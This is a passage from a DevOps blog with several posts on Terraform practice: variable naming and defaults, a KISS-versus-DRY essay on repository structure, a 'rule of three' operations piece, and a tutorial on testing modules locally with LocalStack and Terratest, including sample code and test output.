<<-DOC (with dash): Automatically strips leading whitespace, allowing proper indentation
< (without dash): Preserves all whitespace, breaking terraform-docs parsing and formatting



The indented version plays nicely with automatic documentation generators like terraform-docs, producing clean, readable output in your README.

Smart Defaults with coalesce() and Context

Combine objects with the Terraform null label pattern (context.tf) to provide intelligent defaults:

# Use locals to apply coalesce logic
locals {
  elasticsearch_subdomain = coalesce(var.elasticsearch.subdomain_name, module.this.environment)
  kibana_subdomain        = coalesce(var.kibana.subdomain_name, module.this.environment)
}

# Resources reference the locals
resource "aws_route53_record" "elasticsearch" {
  zone_id = var.zone_id
  name    = "${local.elasticsearch_subdomain}.rosesecurity.dev"
  type    = "CNAME"
  records = [aws_elasticsearch_domain.this.endpoint]
  ttl     = 300
}

resource "aws_route53_record" "kibana" {
  zone_id = var.zone_id
  name    = "${local.kibana_subdomain}.rosesecurity.dev"
  type    = "CNAME"
  records = [aws_elasticsearch_domain.this.kibana_endpoint]
  ttl     = 300
}


The coalesce() function returns the first non-null value, giving you:

Without user input (in “prod” environment):

  elasticsearch.prod.rosesecurity.dev
  kibana.prod.rosesecurity.dev


With user override:
elasticsearch = {
  subdomain_name = "search"
}

Results in: search.prod.rosesecurity.dev

Let users configure only what matters, default the rest.

Group related variables into objects, use optional() for flexibility, document with indented HEREDOCs, and combine with coalesce() for intelligent defaults. Your module users will thank you.



Avoid Double Negatives in Variable Names

Boolean variables with negative names add unnecessary mental overhead. Positive variable names make conditional logic clearer and reduce the chance of configuration mistakes.

The Problem

# ❌ Negative variable name
variable "disable_encryption" {
  description = "Disable encryption"
  type        = bool
  default     = false
}

resource "aws_s3_bucket_server_side_encryption_configuration" "this" {
  count  = var.disable_encryption ? 0 : 1
  bucket = aws_s3_bucket.this.id
  # ...
}


The count line requires mental translation: “If disable_encryption is false, then count is 1, so encryption is enabled.” That’s a double negative in what should be straightforward logic.

This pattern creates real problems during code review. A change from default = false to default = true looks like it’s “enabling” something when it’s actually doing the opposite.

The Solution

# ✅ Positive variable name
variable "encryption_enabled" {
  description = "Enable encryption"
  type        = bool
  default     = true
}

resource "aws_s3_bucket_server_side_encryption_configuration" "this" {
  count  = var.encryption_enabled ? 1 : 0
  bucket = aws_s3_bucket.this.id
  # ...
}


The logic now reads directly: “If encryption_enabled is true, create the encryption config.”

Positive naming also makes security choices more explicit. Setting encryption_enabled = false is visually clearer than disable_encryption = true, even though they’re functionally equivalent.

Name variables for what they enable, not what they prevent.



If you liked (or hated) this blog, feel free to check out my GitHub!



KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever
2025-11-14T00:00:00+00:00
The Scale Gap Problem

Every Infrastructure as Code tutorial starts the same way: provision a single S3 bucket, create one EC2 instance, deploy a basic load balancer. The examples are clean, simple, and elegant. You follow along, everything works, and you feel like you understand Terraform.

Then you get to your actual production environment, and everything changes.

You’re not starting from scratch with a blank AWS account. You’ve got existing resources that were manually created two years ago by someone who left the company. There’s brownfield infrastructure everywhere with no clear documentation. You need to import existing state, figure out what’s actually running, and somehow wrangle it all into code without breaking production. On top of that, you need to manage 200 instances across dev, staging, and production environments. Multiple AWS accounts with different configurations and permissions. Three regions for disaster recovery. Azure for the legacy workloads that nobody wants to touch. GCP running your GKE clusters for the containerized applications.

Suddenly that elegant tutorial code becomes a nightmare of orchestration, state management, environment-specific configurations, and brownfield complexity. You’re not just writing infrastructure code anymore. You’re trying to organize, orchestrate, and maintain it at scale while dealing with the reality that infrastructure is messy, evolving, and full of historical baggage.

This is the scale gap, and it’s where the KISS vs DRY debate stops being theoretical and starts costing real time, money, and engineering effort.

The DRY Revolution: Solving Yesterday’s Problems

When teams hit the scale gap, the instinct is to eliminate repetition. DRY (Don’t Repeat Yourself) is gospel in software engineering, so infrastructure engineers did what they do best and built tools to solve the problem.

Terragrunt emerged to manage backend configurations and reduce repetition across environments. Terraspace and other abstraction frameworks followed, promising sophisticated hierarchical inheritance models and dynamic configuration generation. Module libraries grew into complex ecosystems. Teams adopted these patterns because they represented “best practices,” not necessarily because they had the specific problems these tools were designed to solve.

The promise was compelling: write your infrastructure once, reuse it everywhere, maintain it in one place, and scale effortlessly.

Terraform itself evolved to address these needs as well, adding workspaces, dynamic blocks, for_each, improved module capabilities, and other features designed to support DRY principles natively.

On paper, it all made perfect sense. In practice, the cost turned out to be higher than anyone expected.

The Hidden Costs of Going DRY

When Abstractions Break, Troubleshooting Becomes Archaeological

It’s 3 AM and production is down. You need to understand why Terraform is trying to destroy and recreate your database, and you need to understand it right now.

With a DRY setup using Terragrunt and hierarchical inheritance, you’re not just reading Terraform code. You’re tracing values through multiple layers: the root terragrunt.hcl with base configurations, environment-specific overrides in nested directories, dynamically generated backend configurations, module abstractions that call other modules, and variables cascading through inheritance chains.

Where did that database configuration value actually come from? The global config? The environment override? A module default? You’re playing detective instead of fixing the problem. Each abstraction layer adds cognitive overhead when you can least afford it, which is during high-pressure incidents at 3 AM.

The fundamental issue is that DRY tooling optimizes for writing code, not reading it under pressure.

The Onboarding Cliff

It’s a new team member’s first day and they need to update a security group rule in the staging environment. Simple enough, right?

With DRY abstraction tooling, they need to learn Terraform itself, your module library’s conventions and abstractions, Terragrunt (or Terraspace, or your custom wrapper), your hierarchical configuration structure, how values inherit and override across layers, and where to make changes without breaking other environments.

That’s not onboarding, that’s an apprenticeship. What should take an hour takes days. What should be a simple change becomes a guided tour through your infrastructure philosophy.

Compare this to opening a directory, seeing exactly what gets deployed to staging, making the change, and submitting a PR. The difference in time-to-productivity is measured in weeks.

Ecosystem Lock-in: The Hidden Technical Debt

Once you’ve invested in a DRY abstraction framework, you’re locked in. Your entire codebase assumes its patterns. Your team has learned its idioms. Your CI/CD pipelines depend on it. Your documentation references it.

Migrating away becomes a massive project that no one wants to fund. Meanwhile, the tool’s limitations become your limitations. When Terraform adds new features, you wait for your abstraction layer to support them—if it ever does.

You’ve traded lines of code for organizational flexibility.

The KISS Alternative: Orchestration in Pipelines, Simplicity in Code

After years of working with various Terraform patterns, from sophisticated DRY frameworks to custom abstraction layers, I found a pattern that just works: pure Terraform with GitHub Actions orchestration.

This isn’t about rejecting tools like Terragrunt or Terraspace entirely. They have their place at specific scales and contexts. But for the majority of teams managing infrastructure at moderate scale, there’s a simpler path that works better.

The Core Insight: Complexity Can Only Be Relocated

Orchestration complexity across environments cannot be eliminated. You can’t wish away the fact that dev, staging, and production need different configurations, or that multi-region deployments require coordination.

The question isn’t “how do we eliminate complexity?” It’s “where do we put the complexity to minimize time to business value?”

DRY approach: Complexity lives in abstraction tooling and configuration hierarchies
KISS approach: Complexity lives in CI/CD pipelines, where it’s observable and debuggable

The Repo Structure: Nested and Navigable

├── aws/
│   ├── us-east-1/
│   │   ├── dev/
│   │   │   ├── vpc/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── eks/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── mwaa/
│   │   │   │   └── [terraform files]
│   │   │   ├── opensearch/
│   │   │   │   └── [terraform files]
│   │   │   └── rds/
│   │   │       └── [terraform files]
│   │   ├── staging/
│   │   │   ├── vpc/
│   │   │   ├── eks/
│   │   │   ├── mwaa/
│   │   │   └── [other services]
│   │   └── prod/
│   │       ├── vpc/
│   │       ├── eks/
│   │       ├── mwaa/
│   │       └── [other services]
│   └── us-west-2/
│       └── [similar structure]
├── azure/
│   └── [similar structure]
├── gcp/
│   └── [similar structure]
└── modules/
    ├── networking/
    ├── compute/
    ├── kubernetes/
    └── databases/


Key characteristics:

  Can break down by service (eks, mwaa, opensearch) or by logical grouping depending on your needs
  Each service has its own state file, isolated blast radius
  Reusable modules in central directory
  No terraliths, no monolithic state files
  Completely navigable, you can grep for anything


Each service directory is a complete Terraform root module. Open aws/us-east-1/prod/eks/ and you see exactly what’s deployed for your production EKS cluster in us-east-1. No inheritance chains. No dynamic generation. No magic. Just the actual configuration that gets applied.

Yes, Backend Configs Repeat (And That’s Actually a Feature)

# aws/core-infrastructure/prod/backend.tf
terraform {
  backend "s3" {
    bucket         = "myorg-terraform-state-prod"
    key            = "core-infrastructure/terraform.tfstate"
    region         = "us-east-1"
    encrypt        = true
    dynamodb_table = "terraform-state-lock-prod"
  }
}


This config appears in every environment directory with slight variations. DRY purists hate this, but I love it.

When something goes wrong with state, I can immediately see which bucket holds this state, which DynamoDB table provides locking, and I don’t need to trace through dynamic generation logic. Running grep "myorg-terraform-state-prod" shows me every environment using that bucket instantly.

The cost of repetition is about 100 lines of simple YAML across 20 environments. The benefit is instant troubleshooting, zero cognitive overhead, and perfect clarity about where everything lives.

Orchestration Lives in Pipelines

This is where the magic happens, and where the orchestration complexity actually belongs.

Home-grown GitHub Actions provide:

For Pull Requests:

  Auto-detect which environments changed based on file paths
  Run terraform plan for affected environments
  Post plan output as PR comment
  Run security/compliance checks
  Block merge on plan failures


For Main Branch:

  Auto-detect environments to apply
  Run terraform apply with approval gates
  Alert on failed applies
  Remediate orphaned resources
  Track drift and create tickets


Scheduled:

  Nightly drift detection across all environments
  Compare live state to code
  Alert on unexpected changes


The result is minimal troubleshooting, teams freed to focus on business value, and infrastructure that’s invisible (which is exactly as it should be).

Addressing the Objections

“But You’re Repeating Backend Configurations!”

Yes. Intentionally.

100 lines of repeated backend config across environments vs. 40 hours learning Terragrunt’s nuances. Which has a better ROI?

Repetition creates greppability. When investigating state issues, grep "bucket-name" immediately shows every environment. No tracing through dynamic generation. No “where did this value come from?”

In infrastructure code, transparency trumps terseness every time.

“You Don’t Have Hierarchical Inheritance!”

Correct, and that’s also intentional.

Hierarchical inheritance creates implicit dependencies. Values cascade from global to regional to environment-specific configs. When something breaks, you’re debugging the inheritance chain instead of the infrastructure.

Without inheritance, every value is explicit in the environment directory. New team members don’t need to learn your inheritance model, they just read the config.

The onboarding time saved pays for repeated config 100 times over.

“This Won’t Scale!”

It depends on what you mean by “scale.”

200 environments across multiple accounts and regions? This pattern handles it cleanly. Each environment is independent, changes are isolated, and blast radius is contained.

The pattern breaks down at truly massive scale, like 1000+ environments with complex interdependencies. At that point, you need more sophisticated tooling. But be honest: do you actually have that problem, or are you solving for imagined future scale?

Most teams adopt DRY tooling as “best practice” before hitting the scale where it provides value. They pay the complexity cost without reaping the benefits.

When to Use What: The Nuanced Reality

KISS Makes Sense When:

  You have fewer than 500 environments
  Team size is small to medium (< 50 engineers)
  Change frequency is low (infrastructure mostly stable after initial deployment)
  Operational clarity is critical (regulated industries, high-stakes infrastructure)
  Team has varied experience levels (sysadmins, not primarily developers)
  Troubleshooting speed matters more than code elegance


DRY Tooling Makes Sense When:

  You genuinely have massive scale (1000+ environments with interdependencies)
  Your team is primarily platform engineers comfortable with abstraction
  You have dedicated platform team maintaining the tooling
  Environment configurations have complex shared logic that changes frequently
  You’re building infrastructure-as-a-product with many consumers
  Compliance requires enforced patterns across all deployments


The Real Question: What’s Your Actual Cost Metric?

If your cost metric is lines of code written, choose DRY.
If your cost metric is time to accomplish business goals, choose KISS.

Everything that increases time to business value (technical debt from abstraction, lengthy onboarding, opaque troubleshooting) is expensive regardless of how “clean” the code looks.

The Anti-Pattern: Engineering for Engineering’s Sake

The most dangerous trap in infrastructure work is falling in love with the tool or solution rather than the problem.

When teams spend months building sophisticated hierarchies with dynamic generation and complex inheritance models, they’re often solving for code aesthetics, not business needs. The infrastructure becomes the focus instead of what it enables.

Good infrastructure engineering is invisible. It lets other teams ship quickly without thinking about the underlying platforms. It doesn’t require specialized knowledge to make basic changes. It doesn’t become a bottleneck or a point of pride, it’s just there, working, quietly enabling the business.

This requires humility. The “clever” solution that demonstrates engineering prowess is often the wrong solution for the business. The “boring” solution that anyone can understand and modify is often right.

The Minimum Viable Architecture Principle

Start with what you need now. Build it simply. Make it modular so pieces can be replaced. Iterate and improve over time as actual needs emerge.

Don’t build for imagined future scale that may never materialize. Don’t adopt sophisticated tooling because it’s “best practice” if you don’t have the problems it solves. Don’t engineer abstractions that save lines of code but cost weeks of onboarding time.

Infrastructure is an auxiliary operation. Its job is to get out of the way and let the business move fast. Every layer of abstraction, every sophisticated pattern, every clever optimization should be justified by actual business impact—not engineering aesthetics.

Conclusion: Choose Boring Technology

After years of working with Infrastructure as Code at various scales, here’s what I’ve learned:

Orchestration complexity can’t be eliminated, it can only be relocated. The question is where to put it. For most teams, putting that complexity in observable, debuggable CI/CD pipelines beats putting it in abstraction frameworks and configuration hierarchies.

Terraform itself is powerful enough for most use cases. Most teams don’t need additional abstraction layers. Pure Terraform with thoughtful repo structure and pipeline orchestration handles moderate scale beautifully while keeping troubleshooting straightforward and onboarding fast.

There’s a place for sophisticated DRY tooling at massive scale with dedicated platform teams. But most teams aren’t there yet. They’re paying complexity costs for benefits they haven’t yet earned.

Choose boring technology. Keep it simple. Focus on business velocity over code elegance. Your 3 AM self will thank you.



If you liked (or hated) this blog, feel free to check out my GitHub!


Gang of Three: Pragmatic Operations Design Patterns
2025-10-23T00:00:00+00:00
This blog is dedicated to arcaven, who initially made me aware of this observation and opened my eyes to the wild world of infrastructure and system operations patterns at scale.

I Can’t Unsee It

A few weeks ago, something clicked. Maybe the shorter, winter-approaching days slowed me down enough to notice, but suddenly threes were everywhere. Why do we split environments into development, staging, and production? Why do we stage upgrades across three clusters? Why do we run hot, warm, and cold storage tiers? Why does our CI/CD pipeline have build and test, staging deployment, and production deployment gates?

The number three keeps showing up in systems work, and surprisingly few people talk about it explicitly. As it turns out, this pattern is not coincidence. It represents the intersection of distributed systems theory and practical operations experience. Once you start looking for it, you’ll find the rule of three embedded in nearly every mature infrastructure decision.

Where Consensus Algorithms Meet Change Management

Distributed systems run on quorum-based decision making. What that means is that a majority of nodes have to agree before committing state changes (see Paxos and Raft). These consensus algorithms are designed to handle node failures, communication delays, and network partitions while ensuring the system can continue making progress even when failures occur. With three nodes, you can lose one and still have two nodes available to form a majority. This gives you fault tolerance and forward progress in the same architectural package.

Two nodes cannot lose anything without risking deadlock or split-brain scenarios. Four or five nodes provide more headroom for failures, but three is the minimum viable number that actually delivers reliable consensus. It is also practical from a cost and complexity perspective. This is why you see three-node clusters everywhere across the industry. This is not cargo culting or blind imitation, this is mathematics driving architecture.

The same logic drives traditional thinking around redundancy planning. Three instances means one for baseline capacity, one available during maintenance windows, and one ready for the surprise failure at 3am. Load balancers, database replicas, and availability zones all follow this pattern because it maps cleanly to how systems actually fail in production environments.

This pattern also extends to monitoring and alerting systems. Three data points allow you to establish a trend and distinguish between noise and signal. A single metric spike might be nothing, two consecutive spikes suggest investigation, but three consecutive anomalies typically trigger automated responses or pages. The threshold of three provides enough confidence to act without creating alert fatigue from false positives.

AWS Best Practices and Chaos Engineering

AWS regions typically ship with three or more availability zones, and the Well-Architected Framework encourages spreading workloads across them. This is not just resilience theater or checkbox compliance. It embodies that same quorum mathematics we discussed earlier. Lose one availability zone and your system continues running with consensus intact. Your application remains available, your data stays consistent, and your customers notice nothing.

Chaos engineering practices naturally gravitate toward threes as well. Kill one instance and observe what happens. You are testing real failure modes while keeping two healthy nodes as a safety net. This allows destructive testing that does not actually destroy your service. You gain confidence in your resilience mechanisms without risking a full outage. Tools like Chaos Monkey and Gremlin are built around this philosophy of controlled, incremental failure injection.

Rolling deployments across three clusters provide a built-in verification pattern that works remarkably well in practice. Deploy to the first cluster, verify correct behavior, then proceed to the second. Verify again, then move to the third. These two checkpoints before full rollout give you opportunities to catch unusual issues before they propagate everywhere. Your first cluster serves as your canary, detecting problems early. Your second cluster provides a confidence check that the issue was not environment-specific. Your third cluster represents your validated rollout to the remainder of your infrastructure.

Storage Hierarchies and Performance Tiers

Storage systems provide another compelling example of the rule of three in action. Hot storage serves frequently accessed data with low latency. Warm storage holds less frequently accessed data at moderate cost and performance. Cold storage archives rarely accessed data at minimal cost. This three-tier architecture balances performance requirements against budget constraints while providing clear migration paths as data ages.

Cloud providers have built entire product lines around this model. Amazon S3 offers Standard, Infrequent Access, and Glacier tiers. Azure provides Hot, Cool, and Archive tiers. Google Cloud offers Standard, Nearline, and Coldline storage classes. The consistency across providers suggests this is not arbitrary product segmentation but rather a natural reflection of how organizations actually use data over time.

Database systems follow similar patterns. Many databases implement a three-level caching strategy with L1 cache in memory, L2 cache on fast local storage, and L3 representing the authoritative data on persistent storage. Each level trades off speed for capacity and durability. This hierarchy allows databases to serve most queries from fast cache while maintaining data integrity through persistent storage.

The Practical Value of Three

Understanding why three works so well helps us make better infrastructure decisions. When designing a new system, starting with three of anything gives you a resilient foundation without over-engineering. Three availability zones, three environment tiers, three deployment stages, three monitoring thresholds. Each application of the pattern provides fault tolerance, verification opportunities, and practical operability.

This does not mean three is always the right answer. Some systems genuinely need more redundancy or more granular staging. However, three serves as an excellent default that you should consciously decide to deviate from rather than accidentally under-provision. If you find yourself choosing two of something, ask whether you are accepting unnecessary fragility. If you are choosing five, ask whether the additional complexity provides proportional value. Thanks for reading, and if you like this blog, you might like the code and tools in my Github.


Testing IaC with the TerraStack
2025-08-15T00:00:00+00:00
Context

You write a Terraform module, parameterize the inputs, add some advanced settings, and push your PR. You’re 76% confident it works as intended. Most configuration looks solid, but a few settings could go either way when your apply pipeline runs. You’ve heard about test-driven development, seen test directories in popular open source Terraform modules with some obscure Go code, but you’re not sure how it all fits together. On top of that, you don’t have a dedicated test account for deploying test resources, and spinning up real AWS infrastructure just to test some simple configurations feels like overkill.

I’ve seen this scenario a lot, so I took a crack at a solution. Testing Infrastructure as Code has always been a bit of a pain point with limited options. Lots of cross your fingers and hope, manual testing in dev accounts, unit testing with mocks that miss actual cloud provider interactions, or expensive integration testing with real resources (that become orphaned and require aws-nuke… different story for another blog). What we really need is something that gives us confidence without the overhead, cost, or complexity of managing separate test infrastructure.

Building the TerraStack

I built yet another Go package to eliminate some pains of testing Infrastructure as Code (IaC). When you don’t have a dedicated test account, can’t predict how your configurations will hold up when they actually hit the API, and want to have a consolidated way to test locally and in CI/CD pipelines, this helper library can help. The go-localstack package combines the power of LocalStack (a fully functional local AWS cloud stack) with Terratest’s battle-tested testing framework. I jokingly call this duo the TerraStack (please don’t sue me, company that builds geospatial products that enable smarter land asset management and development).

Any way, LocalStack spins up a containerized environment that mimics AWS services locally. No real resources, no surprise bills, no cleanup headaches. Your Terraform code thinks it’s talking to real AWS, but it’s actually hitting LocalStack’s mock services running in Docker. This approach solves several pain points at once like fast feedback loops with tests running in seconds rather than minutes, CI/CD friendly integration since everything runs in containers, real API interactions unlike unit tests with mocks, and automatic cleanup when the container dies.

Setting Up Your Test Environment

Let’s walk through a basic example that tests an S3 bucket configuration. You’ll need a basic Terraform configuration and a Go test file to get started. Here’s a simple configuration that creates an S3 bucket with some tags:

test.tf:

# An example Terraform configuration (stolen from provider docs) for provisioning an S3 bucket with Localstack
resource "aws_s3_bucket" "example" {
  bucket = "my-tf-test-bucket"

  tags = {
    Name        = "My bucket"
    Environment = "Dev"
  }
}


For the provider configuration, you have two options. The first approach requires configuring the AWS provider to point directly to LocalStack endpoints. Notice how we’re pointing the AWS provider endpoints to LocalStack instead of real AWS, using dummy credentials since LocalStack doesn’t authenticate, and setting default tags to help identify resources created during testing:

providers.tf:

provider "aws" {
  region                      = "us-east-1"
  access_key                  = "test"
  secret_key                  = "test"
  s3_use_path_style           = false
  skip_credentials_validation = true
  skip_metadata_api_check     = true
  skip_requesting_account_id  = true


  endpoints {
    s3                       = "http://s3.localhost.localstack.cloud:4566"
    sts                      = "http://localhost:4566"
  }

  default_tags {
    tags = {
      Environment = "Local"
      Service     = "LocalStack"
    }
  }
}


Alternatively, you can skip the provider configuration entirely by using the tflocal binary instead of terraform. This is LocalStack’s wrapper around Terraform that automatically configures all the necessary provider settings. To use this approach, you’ll need to install the LocalStack CLI in your test environment with pip install localstack, then set the TerraformBinary option in your Terratest configuration to tflocal. This simplifies your setup significantly since you don’t need to manage provider endpoint configurations, but it does add a Python dependency to your test environment.

Writing Comprehensive Tests

The Go test is where go-localstack shines by abstracting away the container management complexity. Here’s a basic test that demonstrates the core functionality:

s3_bucket_test.go:

package main

import (
	"context"
	"testing"

	"github.com/R0seSecurity/go-localstack/localstack"
	"github.com/docker/docker/client"
	"github.com/gruntwork-io/terratest/modules/terraform"
	"github.com/stretchr/testify/assert"
)

func TestS3BucketWithLocalStack(t *testing.T) {
	t.Parallel()

	ctx := context.Background()

	// Create a Docker client
	cli, err := client.NewClientWithOpts(client.FromEnv, client.WithAPIVersionNegotiation())
	assert.NoError(t, err)
	defer func() { _ = cli.Close() }()

	// Start LocalStack container
	runner, err := localstack.NewRunner(cli)
	assert.NoError(t, err)

	containerID, err := runner.Start(ctx)
	assert.NoError(t, err)
	assert.NotEmpty(t, containerID)

	// Run Terratest with Terraform options
	tfOptions := &terraform.Options{
		TerraformDir: ".",
		Upgrade:      true,
	}

	defer terraform.Destroy(t, tfOptions)
	terraform.InitAndApply(t, tfOptions)
}


This basic test spins up a LocalStack container using Docker, configures Terratest to run Terraform commands against our configuration, runs terraform init and terraform apply, and automatically runs terraform destroy when the test completes thanks to the defer statement. The entire test cycle from container startup to resource creation and cleanup takes just under 11 seconds, which is pretty impressive for a full integration test.

Advanced Testing Scenarios

You can extend this approach significantly beyond basic resource creation. For more comprehensive validation, you can use Terratest’s built-in assertion functions and the AWS SDK to verify that resources were created with the correct properties. Here’s how you might validate that your S3 bucket name was created and outputted successfully:

You can add an additional output to your Terraform configuration:

output "bucket_name" {
  description = "The name of the S3 bucket"
  value       = aws_s3_bucket.example.bucket
}


And update your test logic to ensure the output logic works:

// After terraform apply, validate the bucket was created correctly
bucketName := terraform.Output(t, tfOptions, "bucket_name")
assert.Equal(t, "my-tf-test-bucket", bucketName)


Using Test Fixtures and Variables

For testing modules with different configurations, you can leverage Terratest’s support for variable files and fixtures. Create a fixtures directory with different .tfvars files for various test scenarios:

tfOptions := &terraform.Options{
    TerraformDir: "./fixtures/basic-bucket",
    VarFiles:     []string{"test.tfvars"},
    Vars: map[string]interface{}{
        "bucket_name": fmt.Sprintf("test-bucket-%s", uuid.New().String()),
        "environment": "test",
    },
}


This approach allows you to test the same module with different input combinations, ensuring your module handles edge cases correctly. You can create separate test functions for different scenarios - basic functionality, advanced configurations, error conditions, and variable validation. For example, you might have TestBasicS3Bucket, TestS3BucketWithEncryption, TestS3BucketWithInvalidName to cover various use cases.

Testing Multi-Resource Stacks

The real power of this approach becomes evident when testing entire stacks of interconnected resources. You can test complete environments with VPCs, subnets, security groups, and EC2 instances all running against LocalStack. The container automatically handles service discovery and networking between different AWS services, so your Lambda functions can actually invoke other services, your EC2 instances can write to S3 buckets, and your API Gateway can trigger the right backend services.

Error condition testing is equally valuable - intentionally break configurations to ensure your modules fail gracefully and provide helpful error messages. This helps catch issues before they hit production and ensures your error handling is robust.

Running Your Tests

With everything in place, you can run your tests with: go test -v ./.... The output shows what’s happening during the test execution, including container startup, Terraform planning and applying, resource creation, and cleanup. The combination of LocalStack’s AWS emulation and Terratest’s testing framework gives you confidence that your infrastructure code works without the operational overhead of managing test accounts or worrying about resource cleanup.

Test output:

❯ go test -v ./...
=== RUN   TestS3BucketWithLocalStack
{"status":"Pulling from localstack/localstack","id":"latest"}
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 retry.go:91: terraform [init -upgrade=true]
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 logger.go:67: Running command terraform with args [init -upgrade=true]
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 logger.go:67: Initializing the backend...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: Initializing provider plugins...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: - Finding latest version of hashicorp/aws...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: - Using previously-installed hashicorp/aws v6.9.0
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67: Terraform will perform the following actions:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:   # aws_s3_bucket.example will be created
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:   + resource "aws_s3_bucket" "example" {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + acceleration_status         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + acl                         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + arn                         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket                      = "my-tf-test-bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_domain_name          = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_prefix               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_region               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_regional_domain_name = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + force_destroy               = false
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + hosted_zone_id              = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + id                          = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + object_lock_enabled         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + policy                      = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + region                      = "us-east-1"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + request_payer               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + tags                        = {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Environment" = "Dev"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Name"        = "My bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:         }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + tags_all                    = {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Environment" = "Dev"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Name"        = "My bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Service"     = "LocalStack"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:         }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website_domain              = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website_endpoint            = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + cors_rule (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + grant (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + lifecycle_rule (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + logging (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + object_lock_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + replication_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + server_side_encryption_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + versioning (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:     }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67: Plan: 1 to add, 0 to change, 0 to destroy.
TestS3BucketWithLocalStack 2025-08-15T12:19:34-04:00 logger.go:67: aws_s3_bucket.example: Creating...
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: aws_s3_bucket.example: Creation complete after 0s [id=my-tf-test-bucket]
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67:
